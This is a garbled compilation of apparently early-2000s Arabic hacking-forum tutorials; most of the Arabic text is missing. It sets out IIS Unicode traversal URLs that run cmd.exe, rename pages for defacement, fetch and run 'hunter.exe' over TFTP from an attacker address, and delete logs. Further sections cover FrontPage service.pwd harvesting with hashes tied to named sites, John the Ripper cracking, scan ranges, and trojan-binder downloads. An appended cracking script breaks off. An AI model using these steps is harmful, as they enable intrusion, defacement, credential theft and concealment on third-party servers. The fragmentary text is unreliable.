%255cwinnt/system32/cmd.exe?/c+
\:dir+c
scripts/../
%c1%1c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%9v../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c0%qf../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c1%8s../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%9c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%pc../winnt/system32/cmd.exe?
\:/c+dir+c
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
vti_bin/..%c0%af../..%c0%af../.._/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts../
%c1%9c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%pc../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%9v../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%qf../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c1%8s../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%1c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%9c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%e0%80%af../winnt/system32/cmd.e
\:xe?/c+dir+c
scripts/../
%f0%80%80%af../winnt/system32/c
\:md.exe?/c+dir+c
scripts/../
%f8%80%80%80%af../winnt/system3
\:2/cmd.exe?/c+dir+c
scripts/..%fc/
%80%80%80%80%af../winnt/system
\:32/cmd.exe?/c+dir+c
msadc/..\%e0\%80\%af../..\/
%e0\%80\%af../..\
%e0\%80\%af../winnt/system32/cmd.
\:exe\?/c+dir+c
cgi-bin/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
samples/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
iisadmpwd/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
vti_cnf/..%c0%af..%c0%af.._/
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
vti_bin/..%c0%af..%c0%af.._/
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
adsamples/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
(2 TFTPD
/http://iisbughelp.4t.com
(3
) (
scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
\C:
scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+D
\D:
scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+E
\E:
.
)) ((
(1 msadc
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
(2 _vti_bin
vti_bin/..%c0%af../..%c0%af../.._/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
IIS )) ((
:
C:\Inetpub\wwwroot
D:\Inetpub\wwwroot
E:\Inetpub\wwwroot
C
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+dir+C:\Inetpub\wwwroot
)
( wwwroot
wwwroot
.
index.htm
)) ((
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp
wwwroot index.htm
.
. index.htm
ss.htm
. c+dir c+ren
))
Dos Command
Prompt
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+ren+C:\Inetpub\wwwroot\index.ht
m+ss.htm
index.htm
ss.htm
(:
A
!!!Hacked
index.htm
TFTP
. TFTP
)
(
\ C:
index.htm \C:
\C:
C:\inetpub\wwwroot
))
(( TFTP
.
TFTP
)) (( .
:
tftp.exe -i XXX.XXX.XXX.XXX get
index.htm
C:\inetpub\wwwroot\index.htm
)) XXX.XXX.XXX.XXX
((
.
index.htm
wwwroot
:
"tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.ht
m+C:\Inetpub\wwwroot\index.htm
(:
TFTP
index.htm
:
msadc/..%c1%9c../..%c1%9c../../
?%c1%9c../winnt/system32/cmd.exe
"/c+tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.ht
m+C:\Inetpub\wwwroot\index.htm
)) (( (:
: . EXE
:
EXE
hunter.exe
:
.
C:\ index.htm
:
msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?
/c+tftp.exe+"i"+XXX.XXX.XXX.XXX+GET+hunter.
exe+C:\hunter.exe
msadc/..%c1%9c../..%c1%9c../../
%c1%9c../hunter.exe
msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?
/c+hunter.exe
*.log
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+del+C:\*.log/s
tmp
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+del+C:\*.tmp/s
))
((
bat
. .
))
(( system32
_______________________________
_______________________________
__________________
:
tftp
))
(( system32
)) ((
.
.
IIS Secure IIS
Eeye
)) ((
%90 . IIS
)) .
(( .
IIS
..
.. .
.
-------- - :
--------
IIS4.0 IIS5.0 80
)) (( .
------------ - :
------------ CGI-Scanner -1 .. Whisker
) :
( www.wiretrip.net/rfp
-2 )
:
( /http://www.activestate.com
-3 ) ( .. IIS
#########################
#########################
#########################
###########
# Game Starts !#
###########
. Administrator
NC.exe IIS Hack.exe
. /http://www.technotronic.com
..
nc.exe
) (Htdocs IIS
. wwwroot
: IISHack.exe
c:\>iishack.exe
http://www.target.com/ 80
your_IP/ncx.exe
. :
/c:\>nc http://www.target.com
eGG SheLL
: IIS4.0
)) (( .
do you want me to explain what to
do next, hey common you must be
kidding
....hehe...
-------------------------------------
-------------- : Null.htw
----------- ..
..
.. ASP
:
?http://www.victim.com/null.htw
CiWe...HiliteType=full
. Default.asp
, :
iissamples/issamples/oop/qfullhit.ht
w
iissamples/issamples/oop/qsumrhit.
htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.ht
w
.
.. LC3
Global.asa
http://www.victim.com/default.asp::
$DATA
-----------------------------------
..
.. .
..
ISM.dll
)( 20%
. Space
:
http://www.victim.com/global.asa
%20(...<=230)global.asa.htr
<=230. 230
.. %20
.. IIS 4.0&5.0
. ,
ISM.dll
..
..
. .
----------: htr.+
-------- .
. ASP
:
http://www.victim.com/global.asa+.h
tr
------------- : site.csc
-----------
DNS DSN, UID
.. and PASS Database
:
http://www.victim.com/adsamples/c
onfig/site.csc
. ..
.
"
"UniCode
> <
><Dark Devil :
. ::
.
.
)
.... (
.
)( Trust Me
::
:
====
Found On 15 May 2001 BY
NSFOCUS
::
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2
::
)
IUSR_machinename
( account
cgi
) DeCode
(
::
http://iisserver/scripts/..%5c..
<=== %...md.exe?/c+dir+c
<==== /http://iisserver
* - /scripts/
)
( .
cgi
( executable directory
iis
:: iis
executable directory
)
(
* <=== winnt/system32/cmd.exe
cmd
)
cmd . ping
netstat .... traceroute
(
* - . .
) (
.
argument
copy .
argument /c c/
:: 2000
cmd ) (?/ cmd
, .
::
Starts a new instance of the Windows 2000 command interpreter

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
    [[/S] [/C | /K] string]

/C      Carries out the command specified by string and then terminates
/K      Carries out the command specified by string but remains
/S      Modifies the treatment of string after /C or /K (see below)
/Q      Turns echo off
/D      Disable execution of AutoRun commands from registry (see below)
::
echo
arguments
)
c/ ( k/
on off
cmd )
(
MCSE
arguments
c/
.
, cmd.exe
:: .
Ping.exe+PRINT cmd.exe?/c
). ( enjoy this ::
http://issserver/scripts/..%5c..
%.../ping.exe+PRINT
* - +c/ c/
argument cmd.exe
cmd + /
c .
+
.
**
. )
(
decode
simplyfiey
::
%255c..%255c../
..../
iis check
iis
check
. iis
check
check
( slash) /
::
computer logic
HexaDecimal
Values values
/ hex value
::
20% : )(space
hex values
,
hex values
decode
( slash) /
::
hex value = /
, 5c%
/ value
iis
value
hexadecimal values
::
%25 = %
%35 = 5
%63 = c
iis checker
/
.
simplify
::
%255c      : %25 = %, 5 = 5, c = c         => %5c
%%35c      : % = %, %35 = 5, c = c         => %5c
%%35%63    : % = %, %35 = 5, %63 = c       => %5c
%25%35%63  : %25 = %, %35 = 5, %63 = c     => %5c
/= 5c% :
5c% / = 5c%
iis
. checker
::
http://iisserver/scripts/..%5c..
%...xe?/c+dir+c:+/s
s/+
.
MCSE
) (
2000
.WIN2000 RESOURCE KIT
"
"
> : <
..
. .
.....
******************
...
.
.....
.
2000 .
. . IIS :
*1 .
*2 .
*3 "
".
*4 .IIS
..
:
wwwroot
Inetpub
IIS
/http://127.0.01
/http://127.0.0.1
.
"
"
> <
><De\/iL Ni9hT :
= =-,,,
)),,,,((
=-
=-
.. =-
=-
=-
= =
)) ((
-1
)) ((
-2
/http://www.name.8m.com
.
FreeServerS
))....8m.s5
)) ((
))
((
))
((
=-
IE 5 IE 5.5
)) "
"((
,,,,
keykey2000
.
http://www.mikkotech.com/kk2000pr
o.exe
SN: K100-43-109-0793218E876A4C9-29
godwill
. 5
))5.5 ((
http://www.thecorpz.org/activex/gw
package.zip
==================== ====
=================
.
enter
Upx ))
((
Html .
General options
enter exe file
))
((
enter html
use default
page.
HTA File Name
Done. ))
((
http://www.thecorpz.org/html/active
sploits.html
===================
====================
.
. .
))
,,((
.
" "
> <
><Linux Girl :
) ( cookies
. .
..
...
. :
-1 .
-2 .
-3 .
-4 : .
.
.
.
IP
. .
Log Files
.
.
.
.
"
"
.
.
.
.
.
:
...
: :
. setcookie
:
:code
:
: name ...
.
: value ... ...
...
... :
. serialize
.
unserialize .
: expire )
1 ( 1970 .
. ... :
<- :
.
<- : .
.
<- : 409
. .
:
:code
<?php
setcookie('site','http://www.palhackerz.com/',time()+3600);
?>
time
) 1 . (1970
:
.
:
:code
<?php
setcookie('site','',time()-360000);
?>
:
-1
. .
-2
.
:
setcookie
.. :
:code
<?php
// setcookie() sends an HTTP header, so it has to run before any HTML is output
setcookie('site','palhackerz.com',time()+20000);
?>
<html>
<body>
<?php
echo "Alfjr.com : the best islamic forum";
?>
</body>
</html>
:
..
.
.
. PHP ...
$_COOKIE
Associative Arrays
.
:
:code
<?php
echo $_COOKIE['site'];
?>
:
:code
palhackerz.com
:
. .
..
-1 : user.php. :
<- : . <- :
-2 index.php
. user.php
:
: user.php -1
:code
<?php
/*-----------------------
Cookies-Based Background Selector..
Created By : "Rasha" <rasha@h4palestine.com>
For : h4palestine.com
-------------------------*/
function display_form(){
?>
<html>
<body>
<!-- Color setting Form -->
<form name="color_select" method="GET">
<INPUT type="hidden" name="do" value="set_color">
<INPUT name="color" type="text" value="<?php echo get_color(); ?>">
</form>
</body>
</html>
<?php
}
function set_color(){
    // keep the chosen colour in a cookie for ten hours, then return to index.php
    setcookie('color', $_GET['color'], time()+36000);
    header('Location: index.php');
}
function get_color(){
    // the stored colour, or white when no cookie has been set yet
    if(isset($_COOKIE['color'])){
        return $_COOKIE['color'];
    }else{
        return "#FFFFFF";
    }
}
function clear_color(){
    // an expiry time in the past makes the browser drop the cookie
    setcookie('color', '', time()-36000);
    header('Location: index.php');
}
// selection: the action is read from the "do" request parameter
// (the original relied on register_globals to populate $do)
$do = isset($_GET['do']) ? $_GET['do'] : '';
if ($do=='display_form'){
    display_form();
}elseif ($do=="set_color"){
    set_color();
}elseif ($do=="clear_color"){
    clear_color();
}
?>
display_form. .
set_color. .
.
get_color
.
clear_color. .
-2 : index.php
get_color
user.php :
:code
<html>
<BODY bgcolor="<?php include('user.php'); echo get_color(); ?>">
<h1>.....</h1>
<br>
<br>
<a href="user.php?do=display_form"></a>
</body>
</html>
" God
Will "
> <
> : <
:
** html .
** ).
34 (
** Godwill .
:
_http://www.geocities.com/love2002
il/godwill16.zip
tlsecurity :
:
html
Godwill
...
html ...
General Options
...
Done
...
Gen
...enter Output 3
...
/http://www.tripod.lycos.co.uk
...
....
) ( zone Alarm
.
...
...
.
"
"NOOP4
> <
>< .MoHfOx. :
god will
.
.. godwill
noob 4.0
=============================
==========
=============================
-1
========
=============================
==
=============================
layout 2<<<<====:::
6
-2 Internet
Explorer 5
-3 Internet
Explorer5.5
4 5
-6 .
=============================
=====================
===================
executable file 3
<<<<====:::
-7
-8
=============================
==========
=============================
-9
<<<<====:::
...
"
"
><
><. ( T.O.L. ( DeXXa :
:
* . .
* FrontPage Server
Extensions .
* Microsoft Office
. FrontPage
* . CHMOD
* . Telnet
* . HTTP
* . SQL
*
. Server Side Scripting
. Language
Screen
. Capture
@ :
.
.
. FrontPage Server
Extensions
. FrontPage Extension
Server
. FrontPage Extension
Server
. FrontPage.
@
* FrontPage Server
. Extensions
* .
* .
* .
.
@ :
PHP
CGI Perl SSL FTP . SQL
Webmasters
Microsoft Office FrontPage
Office
. .
@ FrontPage Server
Extensions
) : .
(
.
Server
.
:
private_/
vti_bin_/
vti_cnf_/
vti_log_/
vti_pvt_/
vti_txt_/
:
* _: vti_bin
:
) : _
( vti_bin
/vti_adm_/..
/vti_aut_/..
.
:
shtml.exe/..
fpcount.exe/..
* _: vti_pvt
:
: service.pwd DES
.
: service.grp . authors
deptodoc.btr : doctodep.btr
.
.
htaccess.
. )
( .
) : .
(
* _: private
. htaccess.
@ FrontPage
Extension Server
FrontPage
Extension Server
. HTTP
FrontPage Request
. . FrontPage
Extension Server
.
fpcount.exe
Extension Server .
.
@ FrontPage Extension
: Server
FrontPage
FTP
. .
: FrontPage Extension Server
) : XP
.
(
* FrontPage
. Office
* File . Open Web
* )
( .
* .
.
*
.
@ FrontPage
. :
:
* :
) : _ vti_inf.html
(
. FrontPage. .
_ vti_inf.html :
http://www.Victim.com/_vti_inf.html
. Source Code
:vti_generator:Programe
Programe Microsoft
FrontPage X . X
* :
. FrontPage. .
. Source Code
: <Head></Head>
<Meta Name="GENERATOR" Content="Programe">
) :
.
(
Start Run . Telnet
80 :Microsoft Telnet> Open
www.Victim.com 80
Request. Method . Head
) : .
( HTTP
http://www.Victim.net
ISP.net
:
) : . .
PHP
(
* .
* PHP
:
<?PHP
// $file is taken from the request as-is (register_globals style) and opened
// without any check on the path it points to
$open = FOpen($file, "r");
$get = FGets($open, FileSize($file));
Echo $get;
FClose($open);
?>
PHP. .
file
:
http://www.Victim.com/uploded_file.
..../../etc/passwd
uploded_file
. .
"
"
> <
> :<
.//
NT - Unix
-1 .
frontpage.
:
netcraft/http://www.netcraft.com
mod_frontpage/x
)=x (
/_vti_inf.html
:
/http://www.almodammer.com
http://www.almodammer.com/_vti_i
nf.html
Enter
Frontpage Configuration
Information
.
/_vti_cnf
:
http://www.almodammer.com/_vti_c
nf
source
vti_generator:Programe
Programe
------------------------------------------------- -2 frontpage
frontpage
/http://www.almodammer.com
fontpage _vti_pvt
http://www.almodammer.com/_vti_p
vt
:
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============
username:passwd
.
service
user / password
operator:hi9LHn9wAMuKM
.operator:
hi9LHn9wAMuKM:
=)=(Crack Jack
=)=(John The Ripper
.
John The Ripper
::
http://www.openwall.com/john
\c:
RUN
txt passwd
start
run
command
Enter
DoS
RUN
.
cd..
>\c:
cd john
Enter
>c:\john
cd RUN
>c:/john/RUN
====
john -i:all passd.txt
-------------------------
====
john -i:Alpha passwd.txt
---------------------------------
====
john -i:Digits passwd.txt
--------------------------------- .
====
john -single passwd.txt
--------------------------------
.
------------------------------------------------------------------------------
john.pot
------------------------------------------------------------------------------ username
password
!!
/
)(1
frontpage
file
open web
)(2
FTP
FTP
ws-ftp
pro ftp
...
DOS
=============================
=========
google
/http://www.google.com
/_vti_pvt
/http://www.altavista.com
link:service.pwd
..
link:adminstrators
password
.
" "
><
> :<
Random Hacking
CGIScripts
Random Hacking
spiders
altavista.com
) link:xxxx.cgi or pl
(
help.cgi link:help.cgi
Ikonboard
HTML
help.cgi
http://www.example.com/cgibin/help.cgi
http://www.example.com/cgi466
bin/help.cgi?helpon=../members/
[member].cgi%00
] [member
][
Ikonboard
2.1.7
CGIScript
url
Exploit
http://www.secure.f2s.com/eng_ver/
/bugs
/http://www.securiteam.com
....
...
CGIScripts
!!
(:
sites 12610 co.il
sites 1104 org.il sites 70
ac.il .sites 78 gov.il
.sites 54 net.il 29
.sites muni.il sites 2009
com .sites 137 net org -
.121 sites .edu - 4 sites
/w3-msql
proxy.isp.net.sa :8080
GET
cgi-bin/w3-msql
WWWMSQL
w3-msql
Exploit w3-msql
http://www.securiteam.com/exploits
/2WUQBRFS3A.html
Random Hacking
w3-msql
/vti_pvt_/
HTML *.
html ..
The page cannot be displayed
url c
perl Shell *.sh
Batch
perl exploit.pl exploit
(:
(:
> perl
exploit.pl > log.htm
Exploit
) ( RedHat 6.2
.
"
"
><
>< marwan911 :
. .
:IIS ) .
(
:apache
.
.
http://www.netcraft.net
whitehouse.org
: //:http /
http://uptime.netcraft.com/up/graph.
...whitehouse.org
The site www.whitehouse.org is
running Microsoft-IIS/5.0 on
Windows 2000
IIS5.0
. 2000
IIS5.0 )
(
. 2000
) (
IIS
.
.
.
www.arank.com
The site www.arank.com is running
)Apache/1.3.20 (Unix
mod_gzip/1.3.19.1a mod_perl/1.26
mod_bwlimited/0.8 PHP/4.0.6
mod_log_bytes/0.3
FrontPage/5.0.2.2510 mod_ssl/2.8.4
OpenSSL/0.9.6 on Linux
apache 1.3.20
FrontPage/5.0.2.2510
. Linux
.
_ vti_pvt _ private
service.pwd users.pwd
authors.pwd adminstators.pwd
)
%70
(
goodyco:CalXS8USl4TGM
http://www.goody.com.sa/_vti_pvt/s
ervice.pwd
goodyco
CalXS8USl4TGM
john the
repaier
) (
john -i PASSWORD.FILE
.
.
.
telnet .
.
c
================
/http://neworder.box.sk
) ( IIS
apache
/http://www.ussrback.com
EXPLOITS
.. c perl
.
"
"
> <
>:
.
( -1. .
( - ) IIS (
( - ) apachc (
( -2 .
( -3
( -4
IIS
.
apachc
.
. .
" )>&<(
"
> <
> : <
* :. (:
* : D:
* : ,
.
* : ,
, !!
* : , (:
* : (:
:2 ,
. .
:2 D:
NT & Unix
, FrontPage
(:
:
Administrator.pwd
Administrators.pwd
Authors.pwd
Users.pwd
_vti_pvt
:
http://www.tradesystemlab.com/_vti
(: _pvt/service.pwd
service.pwd
:
-FrontPage- #
tradesys:FpNTpIDWSk872
. (:
:3 ,
S:
: .
, WS_FTP www
ftp ftp.ebnmasr.com :
,
. (:
:4
. :
tradesys:FpNTpIDWSk872 )(N
:4 !! ,
John The
, Ripper :
http://www.openwall.com/john
:5 , . ,
:5 !! , , (:
: ,
, doc & run :
, run :
: p:
command.com :
, run
:
tradesys:FpNTpIDWSk872
txt passwd run
, , john.exe
command.com :
:6 , ,
:6 . ,
;( , .
(:
:7 , ) , (Y
.
:7 :
, tradesys:FpNTpIDWSk872
. ) tradesys :
( :
:8 ,
$:
:8 ,,, ;( ,
,
) ( D:
(:
:9 ,
, (:
: , :
. spiders
,
. ,
, walla.co.il :
,
;( .
:10 ,
, !!
:10 .
, $:
, ,
,(: (: service.pwd :
(:
:11 , ,
(:
:11
, EXPLOITES
, , (:
, EXPLOITES
. /http://www.ussrback.com :
" CgiScaner
"
><
> : <
1.
2 .
3 .
4 .
.
..
http://mypage.ayna.com/vox9
9/cgiscan3.zip
"
"
> <
> :<
::: .
,,,
,,
.
.
...
. ::
27374 . 1243
**
.
------------
+
........ ,,,,
...
http://mypage.ayna.com/a7lla
1/superscan.zip
---------------212.150.13.1
<--------212.150.32.255
-----------------62.0.150.1
<----------62.0.180.255
---------------199.203.75.1
<--------199.203.72.255
---------------139.92.208.1
<--------139.92.208.255
---------------192.114.42.1
<--------192.114.42.255
----------------216.72.43.1
<---------216.72.43.255
--------------212.143.113.1
<-------212.143.113.255
---------------209.88.198.1
<--------209.88.198.255
---------------212.29.238.1
<--------212.29.238.255
--------------193.128.102.1
<-------193.128.102.255
--------------192.117.236.1
<-------192.117.236.255
----------------213.8.204.1
<---------213.8.204.255
---------------212.25.120.1
<--------212.25.120.255
----------------128.139.1.1
<---------128.139.1.255
<-------------212.2.224.1
<------------212.2.227.255
<--------------212.26.1.1
<-----------212.26.255.225
<-------------213.238.0.1
<-----------213.238.20.255
<-------------212.102.1.1
<------------212.102.3.255
<-----------212.116.190.1
<----------212.116.195.255
<------------212.106.60.1
<-----------212.106.70.255
<-------------195.229.6.1
<-----------195.229.31.255
<-----------195.229.224.1
<----------195.229.255.255
<------------194.170.30.1
<-----------194.170.30.255
<--------------213.42.1.1
<-----------213.42.255.255
<--------------208.7.70.1
<-------------208.7.80.255
<-----------195.226.240.1
<----------195.226.255.255
<------------195.39.130.1
<-----------195.39.145.255
<-------------168.187.1.1
<----------168.187.255.255
<-------------194.133.1.1
<-----------194.133.255.25
<-------------209.58.40.1
<------------209.58.40.255
<------------206.82.133.1
<-----------206.82.133.255
<------------206.49.109.1
<-----------206.49.109.255
<--------------212.72.1.1
<-------------212.72.7.255
<------------193.188.50.1
<----------193.188.200.255
Shadow
Scan Security
http://www.safety-lab.com/SSS.exe
http://www.e3sar.net/almodammer/S
hadowSecurityScanner5.35.exe
:
=============================
===========
SetUp
:
+++++++++++
[] ][1
[] ][2 .
=============================
===========
*****& &*****
.
=)
Start
ShadowScanSecurity
(=
-1-
Scanner
-2-
=1
4 )
(
=2
=3
4
=4
=5
=6
=7
-3-
) (1 -2-
) (2
) (3
-4-
+1+
+2+
+ 3+
+4+
+ 5+ :-3-
+ 6+.
+ 7+
-5-
Done
-6-
Start Scan
1
-5-
"
"
> <
> : <
etc/shadow/
etc/shadow/
BSD
etc/master.passwd/
SGI ARIX
etc/shadow/
. . AIX
etc/security/shadow/
)) )) -
)) 64 64
(( (( ((
etc/shadow/
)) MD5 ((
)) (( NT - XP - 2000
)) (( LanMan
winnt/system32/config/sam/
)) .
.
((
)) ((
_.winnt/repair/sam or sam/
)) - ((
WINNT
.Windows
" ) ( "
> <
:
..
..
..
Telnet
..
Telnet .
.
Port
).(
) (Daemon
. .
:
)( )(
)( .. .
) (Telnet
) (Daemon
..
.. .
) .( )
( .
Telnet )
( ..
.
.
Daemon
.
ftp.zdnet.com 21
- Sources Code
220 l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready.
Banner FTP
Daemon. zdnet
.
.
-2 . .
Username .. Password
zdnet . Anonymous
. :
- Sources Code
user anonymous
.
- Sources Code
- Sources Code
pass @zorro
. Anonymous
.
..
)
) @
.
- Sources Code
..
..
. .
.
)
( .. !!
. . .
:
)( IP
. .
.. . .
:
PASV
- Sources Code
PASV
. IP
) . ( )(
..
- Sources Code
..
) ( IP
. .. 207,189,69,61
12 * 256 + 41 = 3113
. .. 3113
.
Telnet ftp.zdnet.com
.. 3113
..
( LIST.
(
- Sources Code
LIST
.
- Sources Code
125 Data connection already open; Transfer starting.
.
.
.. PASV
.
..
) ( .
.. . CuteFTP!!
http://www.vbip.com/winsock/winsock_ftp_01.asp
) (
http://www.vbip.com/winsock/winsock_ftp_ref_01.htm
http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html
" ) ( "
> <
> :<
:
~~~~~~~~~
. password file password file
) (encryption ) (shadowed
-:
~~~~~~~~~
!
) ( Void Eye
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~
.
nmap
www.inscure.org/nmap
.
SuperScan
. Perl
Perl
C
( /http://www.7lem.com
. ping
(
)37 - 25 - 23 - 22 - 21
/telnet http://www.7lem.com
Windows Linux
SunOS FreeBSD QNX
Linux
...
Linux
---------------------SunOS 5.7
---------------------- login :
. SunOS 5.7
).
( .
.
nc http://www.7lem.com/ 80
---------------------.
.
.
Apache/1.3.* Server
.
.
---------------------
...
110 25
smtp pop
) ( Linux
host 7lem.com
-:
) (
-:
.
.... . queso
.
/queso http://www.7elm.com
queso 80
...
. SunOS 5.7
/http://www.condor.com )
support webmaster ... info (
DNS
.
whois . whois
whois
whois man whois
.
http://www.psyon.org/tools/index.html
. whois
http://www.google.com/search?q=whois&btnG=Google+Search
~~~~~~~~~~~~~~~~~~~~~~~~~~
. void eye
ShadowSecurityScaner
!! .
Apache IIS
CGI Perl PHP
.
..
.
counter
mp3
Don't Tell Me
25 23 21
110
Ikonboard v2.1.8b
Ikonboard v2.1.8b
Ikonboard v2.1.7b
cgi pl
% 80
cgi
etc/passwd
. FreeBSD
shadow master.passwd
.. ...
++++++++++++++++++++++++
} http://www.fbunet.de/cgibin/nph-
{ %20%20%20%20%20.cgi CGI
....
: timduff.com
.
.
i'm from saudi arabia
. .
/../../../../../../../../../../../../../../../../../
/../
!
-:
-1
-2 .
.....
-3 ) Perl -
( Cgi
-4
%100
) (
-5
)
(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~
/http://www.timduff.com
)
(
)( sh
shell
* sh.
shell
)(bat
)(
C
. gcc
gcc Exploit.c -o Exploit
) *c.
* C. c
++
)* (h.
(
Perl
)
(
....
= Exploit
password file
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
----------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh
erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
----------------------------------------------------------------------------------------------
10
.
......
~~~~~~~~~~~~~~~~~~~~~~~~~~
.
!...
* = x Shadowed
= EpGw4GekZ1B9U
DES .
FreeBSD
13
.
password file
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~
Ctrl + Shift
... hwwilson.com
-:
root:x:0:1:Super-User:/:/sbin/sh
root
. root
x
x
0
.
Super-User:/:/sbin/sh
++++++++++++++++++++++++++++
) (encryption ) (shadowed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
shadow file
* x # !
root:x:0:1:Super-User:/:/sbin/sh
root:Q71KBZlvYSnVw:0:1:SuperUser:/:/sbin/sh
Q71KBZlvYSnVw
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~
Crack 5.0a john
the ripper jack the ripper
Crack 5a john the
ripper .
john the ripper .....
-:
. wordlist.
.
[Diagram: each word from the wordlist (about 5000 words here; John the Ripper's own list holds about 700) is encrypted in turn and the result compared with the target hashes Q2wrtUo9LPq2R and Q6LiJ6ct1oUBz.]
john the ripper
john -w:wordlist passwd
wordlist
passwd
----------------------------------------------------------------------------------------------549
Microsoft(R) Windows 98
   (C)Copyright Microsoft Corp 1981-1998.

E:\Desktop\junk\john the ripper>john -w asswd passwd.txt
John the Ripper Version 1.3 Copyright (c) 1996,97 by Solar Designer
Loaded 1 password
v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: ***** DONE
E:\Desktop\junk\john the ripper>
----------------------------------------------------------------------------------------------
john.pot
...
brute
force
wordlist .
. 3
..
. wordlist
5000
wordlist
brute force
john the ripper.
brute force
john -i passwd
passwd
...
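The wordlist-versus-brute-force choice above, as an added example that is not part of the original text: a Python script that runs both search strategies against a salted hash. The hash function is a labelled stand-in (SHA-256 over salt and password, not DES crypt), and the wordlist and target passwords are constructed for the demonstration. Against the 13-character DES crypt(3) hashes shown on this page you would swap in crypt.crypt(word, salt) or, better, hand the file to John the Ripper.

```python
# Added example: the two search strategies the text contrasts, run against a
# salted hash. toy_hash is a labelled stand-in (SHA-256), NOT DES crypt(3);
# swap in crypt.crypt(word, salt) for the 13-char hashes shown on this page.
import hashlib
import itertools
import string
from typing import Callable, Iterable, Iterator, Optional

HashFn = Callable[[str, str], str]


def toy_hash(password: str, salt: str) -> str:
    """Stand-in hash function; only the search strategy matters here."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def mangle(word: str) -> Iterator[str]:
    """A small subset of John's default rules: case changes, reversal, digit suffixes."""
    base = [word, word.capitalize(), word.upper(), word[::-1]]
    yield from base
    for w in base:
        for d in range(10):
            yield f"{w}{d}"
    yield word + "123"


def wordlist_attack(target: str, salt: str, words: Iterable[str],
                    hash_fn: HashFn = toy_hash) -> Optional[str]:
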